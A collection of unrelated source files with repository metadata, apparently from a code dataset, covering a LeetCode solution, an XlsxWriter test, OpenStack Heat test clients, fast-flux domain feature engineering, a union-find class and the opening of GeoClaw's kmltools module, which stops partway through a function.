cls_path, cls_name = self.get_cluster_exec_class(self.state_code + "_" + node_name)
dyna_cls = self.load_class(cls_path, cls_name)
decode_data = decode_data + dyna_cls.load_data(self.state_code + "_" + node_name, parm='all')
file_lists.append(decode_data)
return file_lists | [
"[email protected]"
] | |
ae3450610d3f4a3c4469aa2562e125c8a4c0108f | 475e2fe71fecddfdc9e4610603b2d94005038e94 | /Facebook/moveZeroes.py | f41fef3843fc872dc295c4699bbbe39783028f77 | [] | no_license | sidhumeher/PyPractice | 770473c699aab9e25ad1f8b7b7cd8ad05991d254 | 2938c14c2e285af8f02e2cfc7b400ee4f8d4bfe0 | refs/heads/master | 2021-06-28T20:44:50.328453 | 2020-12-15T00:51:39 | 2020-12-15T00:51:39 | 204,987,730 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 572 | py | '''
Created on Oct 8, 2020
@author: sidteegela
'''
'''
Input: [0,1,0,3,12]
Output: [1,3,12,0,0]
Input: [0,0]
Output: [0,0]
'''
'''
A two-pointer approach could be helpful here. The idea would be to have one pointer
for iterating the array and another pointer that just works on the non-zero elements
of the array.
'''
def moveZeroes(nums):
p = 0
nonZ = 0
while nonZ < len(nums):
if nums[nonZ] != 0:
nums[p], nums[nonZ] = nums[nonZ], nums[p]
p += 1
nonZ += 1
print(nums)
if __name__ == '__main__':
pass
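    # Example runs (illustrative, added for clarity; the two sample inputs
    # from the problem statement above):
    moveZeroes([0, 1, 0, 3, 12])  # prints [1, 3, 12, 0, 0]
    moveZeroes([0, 0])            # prints [0, 0]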
| [
"[email protected]"
] | |
2ff02576828483feb35dafe118dc773c7fb9f7a0 | da19363deecd93a73246aaea877ee6607daa6897 | /xlsxwriter/test/comparison/test_page_breaks05.py | fb2c64036f0be6ae53d7ae0229ca42202a630f17 | [] | no_license | UNPSJB/FarmaciaCrisol | 119d2d22417c503d906409a47b9d5abfca1fc119 | b2b1223c067a8f8f19019237cbf0e36a27a118a6 | refs/heads/master | 2021-01-15T22:29:11.943996 | 2016-02-05T14:30:28 | 2016-02-05T14:30:28 | 22,967,417 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,378 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2015, John McNamara, [email protected]
#
from ..excel_comparsion_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.maxDiff = None
filename = 'page_breaks05.xlsx'
test_dir = 'xlsxwriter/test/comparison/'
self.got_filename = test_dir + '_test_' + filename
self.exp_filename = test_dir + 'xlsx_files/' + filename
self.ignore_files = ['xl/printerSettings/printerSettings1.bin',
'xl/worksheets/_rels/sheet1.xml.rels']
self.ignore_elements = {'[Content_Types].xml': ['<Default Extension="bin"'],
'xl/worksheets/sheet1.xml': ['<pageMargins', '<pageSetup']}
def test_create_file(self):
"""Test the creation of a simple XlsxWriter file with page breaks."""
workbook = Workbook(self.got_filename)
worksheet = workbook.add_worksheet()
worksheet.set_v_pagebreaks([8, 3, 1, 0])
worksheet.write('A1', 'Foo')
workbook.close()
self.assertExcelEqual()
| [
"[email protected]"
] | |
2ae73fa529d6a5d8123828c55ea1d50f63660ebd | 4a43cded9d76bd05ca87f037de19ff921a60e151 | /13day/07-线程多任务.py | 4669c5331f43b6623bc152dc6442a8ad57e8eec5 | [] | no_license | lishuang1994/-1807 | f7d54c3c93d41539747fc77529d56e73a931676f | 23ee6d351a2797d3f5ba7907954d1a93d2745c10 | refs/heads/master | 2020-03-25T10:09:39.333264 | 2018-08-22T10:53:49 | 2018-08-22T10:53:49 | 143,685,206 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 196 | py | import time
from threading import Thread
def saysorry():
print("亲爱的,跪安了")
time.sleep(1)
for i in range(5):
    #t = Thread(target=saysorry)
#t.start()
saysorry()
| [
"[email protected]"
] | |
56e7a6002a1b13179f7eeff237b55cbc56349463 | ca2b93910a308b92712cd81ac12e7345ddb7c9d1 | /r_venv/bin/chardetect | a7917fbfdbafa7afbe83d9a730a5833521b87b66 | [] | no_license | KeksikProg/rrs_site | e90eb146573b4dfc8a3a7d082febb43e4f904e9e | 41fcbbc052b89bf5d16604b5b6a6dc14ab74ad69 | refs/heads/master | 2023-06-27T03:59:36.984418 | 2021-01-02T21:31:40 | 2021-01-02T21:31:40 | 315,104,198 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | #!/home/maxek/python/rrs_site/r_venv/bin/python3.8
# -*- coding: utf-8 -*-
import re
import sys
from chardet.cli.chardetect import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | ||
e34d413a8c1c98d6d21b693a46353b5a9c8d1190 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2819/60731/291725.py | 8bfd0a4aca43e95e2c7b094a9d0e61a6a52acd4a | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 324 | py | n=int(input())
data=list(map(int,input().split()))
numof1=data.count(1)
numof2=data.count(2)
numof3=data.count(3)
numof4=data.count(4)
ans=0
ans+=numof4
num1=int(numof1/4)
ans+=num1
numof1-=4*num1
num2=int(numof2/2)
ans+=num2
numof2-=2*num2
if (num2+numof3)>=numof1:
ans+=(numof2+numof3)
else:
ans+=numof1
print(ans) | [
"[email protected]"
] | |
55782bca4fc53bfb30a3d26d1336c6538a21a16a | 6b8c3974d3ce5f7841e51dcb406666c0c5d92155 | /heat/heat_integrationtests/common/clients.py | c7a7f60e6cf45d26c6119542ab40388bb7cfed8a | [
"Apache-2.0"
] | permissive | swjang/cloudexchange | bbbf78a2e7444c1070a55378092c17e8ecb27059 | c06ed54f38daeff23166fb0940b27df74c70fc3e | refs/heads/master | 2020-12-29T03:18:43.076887 | 2015-09-21T07:13:22 | 2015-09-21T07:13:22 | 42,845,532 | 1 | 1 | null | 2015-09-21T07:13:22 | 2015-09-21T05:19:35 | C++ | UTF-8 | Python | false | false | 5,888 | py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import ceilometerclient.client
import cinderclient.client
import heatclient.client
import keystoneclient.exceptions
import keystoneclient.v2_0.client
import neutronclient.v2_0.client
import novaclient.client
import swiftclient
class ClientManager(object):
"""
Manager that provides access to the official python clients for
calling various OpenStack APIs.
"""
CINDERCLIENT_VERSION = '1'
HEATCLIENT_VERSION = '1'
NOVACLIENT_VERSION = '2'
CEILOMETER_VERSION = '2'
def __init__(self, conf):
self.conf = conf
self.identity_client = self._get_identity_client()
self.orchestration_client = self._get_orchestration_client()
self.compute_client = self._get_compute_client()
self.network_client = self._get_network_client()
self.volume_client = self._get_volume_client()
self.object_client = self._get_object_client()
self.metering_client = self._get_metering_client()
def _get_orchestration_client(self):
region = self.conf.region
endpoint = os.environ.get('HEAT_URL')
if os.environ.get('OS_NO_CLIENT_AUTH') == 'True':
token = None
else:
keystone = self._get_identity_client()
token = keystone.auth_token
try:
if endpoint is None:
endpoint = keystone.service_catalog.url_for(
attr='region',
filter_value=region,
service_type='orchestration',
endpoint_type='publicURL')
except keystoneclient.exceptions.EndpointNotFound:
return None
else:
return heatclient.client.Client(
self.HEATCLIENT_VERSION,
endpoint,
token=token,
username=self.conf.username,
password=self.conf.password)
def _get_identity_client(self):
return keystoneclient.v2_0.client.Client(
username=self.conf.username,
password=self.conf.password,
tenant_name=self.conf.tenant_name,
auth_url=self.conf.auth_url,
insecure=self.conf.disable_ssl_certificate_validation)
def _get_compute_client(self):
dscv = self.conf.disable_ssl_certificate_validation
region = self.conf.region
client_args = (
self.conf.username,
self.conf.password,
self.conf.tenant_name,
self.conf.auth_url
)
# Create our default Nova client to use in testing
return novaclient.client.Client(
self.NOVACLIENT_VERSION,
*client_args,
service_type='compute',
endpoint_type='publicURL',
region_name=region,
no_cache=True,
insecure=dscv,
http_log_debug=True)
def _get_network_client(self):
auth_url = self.conf.auth_url
dscv = self.conf.disable_ssl_certificate_validation
return neutronclient.v2_0.client.Client(
username=self.conf.username,
password=self.conf.password,
tenant_name=self.conf.tenant_name,
endpoint_type='publicURL',
auth_url=auth_url,
insecure=dscv)
def _get_volume_client(self):
auth_url = self.conf.auth_url
region = self.conf.region
endpoint_type = 'publicURL'
dscv = self.conf.disable_ssl_certificate_validation
return cinderclient.client.Client(
self.CINDERCLIENT_VERSION,
self.conf.username,
self.conf.password,
self.conf.tenant_name,
auth_url,
region_name=region,
endpoint_type=endpoint_type,
insecure=dscv,
http_log_debug=True)
def _get_object_client(self):
dscv = self.conf.disable_ssl_certificate_validation
args = {
'auth_version': '2.0',
'tenant_name': self.conf.tenant_name,
'user': self.conf.username,
'key': self.conf.password,
'authurl': self.conf.auth_url,
'os_options': {'endpoint_type': 'publicURL'},
'insecure': dscv,
}
return swiftclient.client.Connection(**args)
def _get_metering_client(self):
dscv = self.conf.disable_ssl_certificate_validation
keystone = self._get_identity_client()
try:
endpoint = keystone.service_catalog.url_for(
attr='region',
filter_value=self.conf.region,
service_type='metering',
endpoint_type='publicURL')
except keystoneclient.exceptions.EndpointNotFound:
return None
else:
args = {
'username': self.conf.username,
'password': self.conf.password,
'tenant_name': self.conf.tenant_name,
'auth_url': self.conf.auth_url,
'insecure': dscv,
'region_name': self.conf.region,
'endpoint_type': 'publicURL',
'service_type': 'metering',
}
return ceilometerclient.client.Client(self.CEILOMETER_VERSION,
endpoint, **args)
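# Minimal usage sketch (illustrative; assumes a `conf` object exposing the
# attributes referenced above, e.g. username/password/tenant_name/auth_url):
#   manager = ClientManager(conf)
#   stacks = list(manager.orchestration_client.stacks.list())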
| [
"[email protected]"
] | |
7b56fc22aa32b03fb0cfa39a1d0b49bca82553d5 | 59d5a801dd8361fe2b68f0cdfc1a0c06bbe9d275 | /Competition/fast-flux域名检测/backup/v1/feature_engineering.py | 70c7ab417fa009bb50ad40233fda391a9e85cdb7 | [] | no_license | HanKin2015/Machine_to_DeepingLearning | 2ff377aa68655ca246eb19bea20fec232cec5d77 | 58fa8d06ef8a8eb0762e7cbd32a09552882c5412 | refs/heads/master | 2023-01-25T01:16:41.440064 | 2023-01-18T08:23:49 | 2023-01-18T08:23:49 | 134,238,811 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 8,016 | py | # -*- coding: utf-8 -*-
"""
File name  : feature_engineering.py
Description: feature engineering
Author     : HanKin
Created    : 2022.10.18
Modified   : 2022.10.18
Copyright (c) 2022 HanKin. All rights reserved.
"""
from common import *
def exception_value_processing_by_delete(dataset, feature, lower_threshold, upper_threshold):
"""异常值处理(删除)
"""
dataset = dataset[(lower_threshold <= dataset[feature]) & (dataset[feature] <= upper_threshold)]
return dataset
def exception_value_processing_by_median(dataset, feature, lower_threshold, upper_threshold):
"""异常值处理(取中位数)
"""
df = dataset[(lower_threshold <= dataset[feature]) & (dataset[feature] <= upper_threshold)]
logger.debug('{}<{},{}>: {}/{}.'.format(feature, lower_threshold, upper_threshold, df.shape[0], dataset.shape[0]))
dataset.loc[dataset[feature] < lower_threshold, feature] = df[feature].median()
dataset.loc[dataset[feature] > upper_threshold, feature] = df[feature].median()
return dataset
def exception_value_processing_by_mean(dataset, feature, lower_threshold, upper_threshold):
"""异常值处理(取平均值)
"""
df = dataset[(lower_threshold <= dataset[feature]) & (dataset[feature] <= upper_threshold)]
logger.debug('{}<{},{}>: {}/{}.'.format(feature, lower_threshold, upper_threshold, df.shape[0], dataset.shape[0]))
dataset.loc[dataset[feature] < lower_threshold, feature] = int(df[feature].mean())
dataset.loc[dataset[feature] > upper_threshold, feature] = int(df[feature].mean())
return dataset
def missing_value_processing(dataset):
"""缺失值处理
"""
    # Forward-fill from the previous value
dataset = dataset.fillna(method='ffill')
return dataset
def exception_value_processing(dataset):
exception_values = [
['SizeOfStackReserve', 0, 2e7],
['ExportRVA', 0, 2e7],
['DebugRVA', 0, 1e7],
['IATRVA', 0, 1e7],
]
for exception_value in exception_values:
feature, lower_threshold, upper_threshold = [elem for elem in exception_value]
dataset = exception_value_processing_by_mean(dataset, feature, lower_threshold, upper_threshold)
if 'label' in dataset.columns:
dataset = exception_value_processing_by_delete(dataset, 'SizeOfImage', 1e4, 5e9)
return dataset
def delete_uncorrelated_features(dataset):
"""删除相关性低的特征
"""
uncorrelated_features = ['time_first', 'time_last', 'rrtype', 'rdata', 'bailiwick']
dataset.drop(uncorrelated_features, axis=1, inplace=True)
return dataset
def datetime_processing(dataset):
"""日期时间处理
"""
dataset['TimeDateStamp'] = dataset['TimeDateStamp'].apply(lambda x: time.strftime("%Y-%m-%d %X", time.localtime(x)))
ts_objs = np.array([pd.Timestamp(item) for item in np.array(dataset['TimeDateStamp'])])
dataset['TS_obj'] = ts_objs
    # Date features (DayName must be mapped to a numeric feature)
dataset['Year'] = dataset['TS_obj'].apply(lambda x: x.year)
dataset['Month'] = dataset['TS_obj'].apply(lambda x: x.month)
dataset['Day'] = dataset['TS_obj'].apply(lambda x: x.day)
dataset['DayOfWeek'] = dataset['TS_obj'].apply(lambda x: x.dayofweek)
dataset['DayName'] = dataset['TS_obj'].apply(lambda x: x.day_name())
dataset['DayOfYear'] = dataset['TS_obj'].apply(lambda x: x.dayofyear)
dataset['WeekOfYear'] = dataset['TS_obj'].apply(lambda x: x.weekofyear)
dataset['Quarter'] = dataset['TS_obj'].apply(lambda x: x.quarter)
day_name_map = {'Monday': 1, 'Tuesday': 2, 'Wednesday': 3, 'Thursday': 4, 'Friday': 5,
'Saturday': 6, 'Sunday': 7}
dataset['DayNameBinMap'] = dataset['DayName'].map(day_name_map)
    # Time features
dataset['Hour'] = dataset['TS_obj'].apply(lambda x: x.hour)
dataset['Minute'] = dataset['TS_obj'].apply(lambda x: x.minute)
dataset['Second'] = dataset['TS_obj'].apply(lambda x: x.second)
#dataset['MUsecond'] = dataset['TS_obj'].apply(lambda x: x.microsecond)
#dataset['UTC_offset'] = dataset['TS_obj'].apply(lambda x: x.utcoffset())
    ## Bin hours into times of day
hour_bins = [-1, 5, 11, 16, 21, 23]
bin_names = ['LateNight', 'Morning', 'Afternoon', 'Evening', 'Night']
dataset['HourBin'] = pd.cut(dataset['Hour'], bins=hour_bins, labels=bin_names)
hour_bin_dummy_features = pd.get_dummies(dataset['HourBin'])
dataset = pd.concat([dataset, hour_bin_dummy_features], axis=1)
return dataset
def discrete_value_processing(dataset):
"""
"""
gle = LabelEncoder()
rrname_label = gle.fit_transform(dataset['rrname'])
rrname_mapping = {index: label for index, label in enumerate(gle.classes_)}
#logger.info(rrname_mapping)
dataset['rrname_label'] = rrname_label
bailiwick_label = gle.fit_transform(dataset['bailiwick'])
bailiwick_mapping = {index: label for index, label in enumerate(gle.classes_)}
#logger.info(bailiwick_mapping)
dataset['bailiwick_label'] = bailiwick_label
dataset['rdata_count'] = dataset['rdata'].apply(lambda x: len(x.split(',')))
return dataset
def time_processing(dataset):
"""观察时间处理
"""
dataset['time_interval'] = dataset['time_last'] - dataset['time_first']
dataset['time_interval'] = dataset['time_interval'].apply(lambda x: int(x / 86400))
return dataset
def features_processing(dataset):
    # Missing-value handling
    #dataset = missing_value_processing(dataset)
    # Outlier handling
    #dataset = exception_value_processing(dataset)
    # Date/time feature handling
    #datetime_processing(dataset)
    time_processing(dataset)
    # Discrete-value handling
    dataset = discrete_value_processing(dataset)
    # Drop uncorrelated features (low correlation)
    dataset = delete_uncorrelated_features(dataset)
    # Special-case handling
return dataset
def extended_custom_features(dataset, extended_features_path):
"""扩展的特征(自定义的字符串特征)
"""
return dataset
def extended_features(dataset, sample_path, extended_features_path):
"""扩展的特征
"""
return dataset
def main():
    # Load the datasets
train_dataset = pd.read_csv(TRAIN_RAW_DATASET_PATH)
train_label = pd.read_csv(TRAIN_LABEL_PATH)
test_dataset = pd.read_csv(TEST_RAW_DATASET_PATH)
logger.info([train_dataset.shape, train_label.shape, test_dataset.shape])
    # Attach the labels
train_label.rename(columns = {"domain": "rrname"}, inplace=True)
train_dataset = train_dataset.merge(train_label, on='rrname', how='left')
logger.info([train_dataset.shape])
    # Remove dirty data
    # Feature engineering
train_dataset = features_processing(train_dataset)
test_dataset = features_processing(test_dataset)
logger.info('train_dataset: ({}, {}), test_dataset: ({}, {}).'.format(
train_dataset.shape[0], train_dataset.shape[1],
test_dataset.shape[0], test_dataset.shape[1],))
    # Move the label to the last column
label = train_dataset['label']
train_dataset.drop(['label'], axis=1, inplace=True)
train_dataset = pd.concat([train_dataset, label], axis=1)
    # Save the datasets
logger.info([train_dataset.shape, test_dataset.shape])
logger.info(train_dataset.columns)
train_dataset.to_csv(TRAIN_DATASET_PATH, sep=',', encoding='utf-8', index=False)
test_dataset.to_csv(TEST_DATASET_PATH, sep=',', encoding='utf-8', index=False)
if __name__ == '__main__':
#os.system('chcp 936 & cls')
logger.info('******** starting ********')
start_time = time.time()
main()
end_time = time.time()
logger.info('process spend {} s.\n'.format(round(end_time - start_time, 3)))
| [
"[email protected]"
] | |
e3c587cf4a2d905939a4c7e8750bc6d0ff07f00c | 4c718d78039ca97e1a9b18897642e8bc5cd394d9 | /Python code of quizzes/Lesson 6/TagTypes.py | e4bdc42307b8303b26cd8b79cf4aa17d2960ee3f | [] | no_license | aish27/data-wrangle-openstreetmaps-data | 81a3fa4a1a06ea8972f6e98af77e9e71350a65bc | 9e5eedf49ca67b480bb969ebe4db77df62bf238d | refs/heads/master | 2020-12-02T19:26:04.726496 | 2015-06-12T17:38:37 | 2015-06-12T17:38:37 | 37,049,682 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,562 | py | #Determines the problematic tag types that exist in a dataset and their numbers.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import xml.etree.cElementTree as ET
import pprint
import re
lower = re.compile(r'^([a-z]|_)*$')
lower_colon = re.compile(r'^([a-z]|_)*:([a-z]|_)*$')
problemchars = re.compile(r'[=\+/&<>;\'"\?%#$@\,\. \t\r\n]')
#Uses regular expressions to check each element and find if it contains a problematic tag.
def key_type(element, keys):
if element.tag == "tag":
temp = element.attrib['k']
print temp
a = re.search(lower,temp)
b = re.search(lower_colon,temp)
c = re.search(problemchars,temp)
if a!=None:
keys["lower"] = keys["lower"] + 1
elif b!=None:
keys["lower_colon"] = keys["lower_colon"] + 1
elif c!=None:
keys["problemchars"] = keys["problemchars"] + 1
else:
keys["other"] = keys["other"] + 1
return keys
#Processes the maps and finds problematic tags.
def process_map(filename):
keys = {"lower": 0, "lower_colon": 0, "problemchars": 0, "other": 0}
for _, element in ET.iterparse(filename):
keys = key_type(element, keys)
return keys
#Uses other methods to find tag types and tests the output.
def test():
keys = process_map('example.osm')
pprint.pprint(keys)
assert keys == {'lower': 5, 'lower_colon': 0, 'other': 1, 'problemchars': 1}
if __name__ == "__main__":
test() | [
"[email protected]"
] | |
a0c7ffbc2b8b323aaf0df3752796182fa2ad9aa5 | 0d0cf0165ca108e8d94056c2bae5ad07fe9f9377 | /12_Dimensionality_Reduction_in_Python/2_Feature_selection_I_selecting_for_feature_information/visualizingTheCorrelationMatrix.py | 219bc39cbbc113f94d69e038232a34aa880c624e | [] | no_license | MACHEIKH/Datacamp_Machine_Learning_For_Everyone | 550ec4038ebdb69993e16fe22d5136f00101b692 | 9fe8947f490da221430e6dccce6e2165a42470f3 | refs/heads/main | 2023-01-22T06:26:15.996504 | 2020-11-24T11:21:53 | 2020-11-24T11:21:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,245 | py | # Visualizing the correlation matrix
# Reading the correlation matrix of ansur_df in its raw, numeric format doesn't allow us to get a quick overview. Let's improve this by removing redundant values and visualizing the matrix using seaborn.
# Seaborn has been pre-loaded as sns, matplotlib.pyplot as plt, NumPy as np and pandas as pd.
# Instructions 1/4
# 100 XP
# Create the correlation matrix.
# Visualize it using Seaborn's heatmap function.
# Instructions 2/4
# 0 XP
# Create a boolean mask for the upper triangle of the plot.
# Instructions 3/4
# 0 XP
# Add the mask to the heatmap.
# # Create the correlation matrix (Instruction 1)
# corr = ansur_df.corr()
# # Draw the heatmap
# sns.heatmap(corr, cmap=cmap, center=0, linewidths=1, annot=True, fmt=".2f")
# plt.show()
# # Create the correlation matrix (Instruction 2)
# corr = ansur_df.corr()
# # Generate a mask for the upper triangle
# mask = np.triu(np.ones_like(corr, dtype=bool))
# Create the correlation matrix (Instruction 3)
corr = ansur_df.corr()
# Generate a mask for the upper triangle
mask = np.triu(np.ones_like(corr, dtype=bool))
# Add the mask to the heatmap
sns.heatmap(corr, mask=mask, cmap=cmap, center=0, linewidths=1, annot=True, fmt=".2f")
plt.show()
| [
"[email protected]"
] | |
f765a53567eb4d535fe4f1d1fd0c6899ff8f27de | 4edbeb3e2d3263897810a358d8c95854a468c3ca | /python3/psutil/count1.py | 2930af68edad4e73b64927a1ebaa37e2c82cd7d6 | [
"MIT"
] | permissive | jtraver/dev | f505d15d45b67a59d11306cc7252114c265f388b | 2197e3443c7619b856470558b737d85fe1f77a5a | refs/heads/master | 2023-08-06T02:17:58.601861 | 2023-08-01T16:58:44 | 2023-08-01T16:58:44 | 14,509,952 | 0 | 1 | MIT | 2020-10-14T18:32:48 | 2013-11-19T00:51:19 | Python | UTF-8 | Python | false | false | 233 | py | #!/usr/bin/env python3
import time
import sys
def main():
# for count in xrange(10000000):
for count in range(10):
print("%s" % str(count))
sys.stdout.flush()
time.sleep(1)
main()
| [
"[email protected]"
] | |
22333f24e36f7de94f303b98576d2fb4166f585b | e91fe9c77c39ab855383839820867d5dda27cfdd | /posts/api/pagination.py | feb17a52e7d48c1ab4073025106caa309455469e | [] | no_license | chutchais/Blog-API | 6a69580c1f97ecce01e500de56e730864f1e519a | 8402d638832703aa4ede7e7e05ac47a902320cd9 | refs/heads/master | 2021-01-12T03:19:36.874801 | 2017-01-12T14:48:42 | 2017-01-12T14:48:42 | 78,195,920 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 249 | py | from rest_framework.pagination import (
LimitOffsetPagination,
PageNumberPagination,
)
class PostLimitOffsetPagination(LimitOffsetPagination):
    default_limit = 2
    max_limit = 10
class PostPageNumberPagination(PageNumberPagination):
    page_size = 2
| [
"[email protected]"
] | |
b878c8557764a724f1d3aeb71971de4a8a664095 | 2fac796fa58c67fb5a4a95a6e7f28cbef169318b | /python/connecting-graph-ii.py | 8dd9c83c7a70a19f748db2b7a41f9c71f45adecf | [] | no_license | jwyx3/practices | f3fe087432e79c8e34f3af3a78dd10278b66dd38 | 6fec95b9b4d735727160905e754a698513bfb7d8 | refs/heads/master | 2021-03-12T20:41:59.816448 | 2019-04-14T06:47:30 | 2019-04-14T06:47:30 | 18,814,777 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 753 | py | class ConnectingGraph2:
# @param {int} n
def __init__(self, n):
self.father = [0 for i in xrange(n + 1)]
self.counter = [1 for i in xrange(n + 1)]
def find(self, a):
if self.father[a] == 0:
return a
self.father[a] = self.find(self.father[a])
return self.father[a]
# @param {int} a, b
# return nothing
def connect(self, a, b):
ra = self.find(a)
rb = self.find(b)
if ra != rb:
self.father[ra] = rb
self.counter[rb] += self.counter[ra]
# @param {int} a
# return {int} the number of nodes connected component
# which include a node.
def query(self, a):
ra = self.find(a)
return self.counter[ra]
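# Example (illustrative):
#   g = ConnectingGraph2(5)
#   g.connect(1, 2)
#   g.query(1)  # -> 2: component {1, 2}
#   g.query(3)  # -> 1: node 3 is still alone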
| [
"[email protected]"
] | |
78ceb669efd476b37e638363e08047a53d19a248 | 2ef73026be3e830d4d272c67dc09977383b17a31 | /new_python/kmltools.py | 9c31df4146b23662cadd6a31cfe76ceff807764b | [
"BSD-3-Clause"
] | permissive | rjleveque/new_features_for_v5.7.0 | 8af89593879eb56cfb097773de59f6ca01d8afdd | b939d18c3e6ff58b7f3a1b96ce4f553a3babbda9 | refs/heads/master | 2020-12-09T01:46:22.336135 | 2020-01-26T00:21:06 | 2020-01-26T00:21:06 | 233,155,725 | 0 | 0 | null | 2020-01-11T00:57:09 | 2020-01-11T00:57:08 | null | UTF-8 | Python | false | false | 38,490 | py | r"""
kmltools module: $CLAW/geoclaw/src/python/geoclaw/kmltools.py
Tools to make kml files to overlay on Google Earth.
Note that color is in KML format, BGR with 2 hex digits for each, e.g.
FF0000 is blue, 00FF00 is green, 0000FF is red, 00FFFF is yellow.
Actually it's an 8 hex digit number, where the first two digits are
transparency, but in this module these default to 'FF' (but you can specify
the full 8 digits if you want it transparent).
:Functions:
- deg2dms - convert decimal degrees to (degrees, minutes, seconds)
 - regions2kml - create a kml outline for each region specified in setrun
- box2kml - create a kml outline from a rectangular box
- quad2kml - create a kml outline for an arbitrary quadrilateral
- poly2kml - create a kml outline for an arbitrary polygon
- line2kml - create a kml line connecting 2 points
- gauges2kml - create a kml marker for each gauge specified in setrun
- pcolorcells_for_kml - version of pcolormesh with appropriate dpi and size
- png2kml - create kml file wrapping a png figure to be viewed on GE
- kml_header - used internally
- kml_footer - used internally
- kml_region - used internally
- kml_gauge - used internally
- kml_png - used internally
- strip_archive_extensions - strip off things like .tar or .gz
"""
from __future__ import absolute_import
from __future__ import print_function
from six.moves import range
from importlib import reload
def f2s(x, num_digits=6):
r"""
Convert float to string in fixed point notation with at most
*num_digits* digits of precision and trailing zeros removed,
for printing nicely in kml description boxes.
"""
format = '%' + '.%sf' % num_digits
s = (format % x).rstrip('0')
return s
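# For example (illustrative): f2s(46.5125) -> '46.5125' and
# f2s(-122.35) -> '-122.35', compact strings for KML coordinate lists.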
def deg2dms(dy):
r"""
Convert decimal degrees to tuple (degrees, minutes, seconds)
"""
from numpy import floor
dy_deg = floor(dy)
dy_min = floor((dy-dy_deg)*60.)
dy_sec = (dy-dy_deg-dy_min/60.)*3600.
return dy_deg,dy_min,dy_sec
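# For example (illustrative): deg2dms(46.5125) -> (46.0, 30.0, 45.0),
# i.e. 46 degrees, 30 minutes, 45 seconds.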
def regions2kml(rundata=None,fname='regions.kml',verbose=True,combined=True):
"""
Create a KML box for each AMR region specified for a GeoClaw run.
:Inputs:
- *rundata* - an object of class *ClawRunData* or None
If *rundata==None*, try to create based on executing function *setrun*
from the `setrun.py` file in the current directory.
- *fname* (str) - resulting kml file.
- *verbose* (bool) - If *True*, print out info about each region found
- *combined* (bool) - If *True*, combine into single kml file with
name given by *fname*. This is the default.
If False, *fname* is ignored and individual files are created for
        each region, with names Domain.kml, Region_00.kml, etc.
These will show up separately in GoogleEarth so they can be turned
on or off individually.
First create a box for the entire domain (in red) and then a box
for each region (in white).
:Example:
>>> from clawpack.geoclaw import kmltools
>>> kmltools.regions2kml()
is equivalent to:
>>> from clawpack.geoclaw import kmltools
>>> from setrun import setrun
>>> rundata = setrun()
>>> kmltools.regions2kml(rundata)
By default this creates a file named *regions.kml* that can be opened in
Google Earth.
"""
from numpy import cos,pi,floor
if rundata is None:
try:
import setrun
reload(setrun)
rundata = setrun.setrun()
except:
raise IOError("*** cannot execute setrun file")
    fname_combined = fname
clawdata = rundata.clawdata
x1,y1 = clawdata.lower[0:]
x2,y2 = clawdata.upper[0:]
description = " x1 = %s, x2 = %s\n" % (f2s(x1),f2s(x2)) \
+ " y1 = %s, y2 = %s\n" % (f2s(y1),f2s(y2))
mx,my = clawdata.num_cells[0:]
dx = (x2-x1)/float(mx)
dx_meters = dx*111e3*cos(pi*0.5*(y1+y2)/180.)
dy = (y2-y1)/float(my)
dy_meters = dy*111e3
if verbose:
print("Domain: %10.6f %10.6f %10.6f %10.6f" % (x1,x2,y1,y2))
dx_deg,dx_min,dx_sec = deg2dms(dx)
dy_deg,dy_min,dy_sec = deg2dms(dy)
#print "Level 1 resolution: dx = %g deg, %g min, %g sec = %g meters" \
# % (dx_deg,dx_min,dx_sec,dx_meters)
levtext = "Level 1 resolution: dy = %g deg, %g min, %g sec = %g meters\n" \
% (dy_deg,dy_min,dy_sec,dy_meters)
if verbose:
print(levtext)
description = description + levtext
amr_levels_max = rundata.amrdata.amr_levels_max
refinement_ratios_y = rundata.amrdata.refinement_ratios_y
num_ref_ratios = len(refinement_ratios_y)
if amr_levels_max > num_ref_ratios+1:
raise IOError("*** Too few refinement ratios specified for " \
+ "amr_levels_max = %i" % amr_levels_max)
dy_levels = (num_ref_ratios+1) * [dy]
for k,r in enumerate(refinement_ratios_y):
level = k+2
dy = dy_levels[k] / r
dy_levels[k+1] = dy
dy_meters = dy*111e3
dy_deg,dy_min,dy_sec = deg2dms(dy)
levtext = "Level %s resolution: dy = %g deg, %g min, %g sec = %g meters (refined by %i)\n" \
% (level,dy_deg,dy_min,dy_sec,dy_meters,r)
if verbose:
print(levtext)
description = description + levtext
if verbose:
print("Allowing maximum of %i levels" % amr_levels_max)
elev = 0.
if not combined:
fname = 'Domain.kml'
else:
fname = fname_combined
kml_text = kml_header(fname)
mapping = {}
mapping['x1'] = x1
mapping['x2'] = x2
mapping['y1'] = y1
mapping['y2'] = y2
mapping['elev'] = elev
mapping['name'] = 'Computational Domain'
mapping['desc'] = description
mapping['color'] = "0000FF" # red
mapping['width'] = 2
region_text = kml_region(mapping)
kml_text = kml_text + region_text
if not combined:
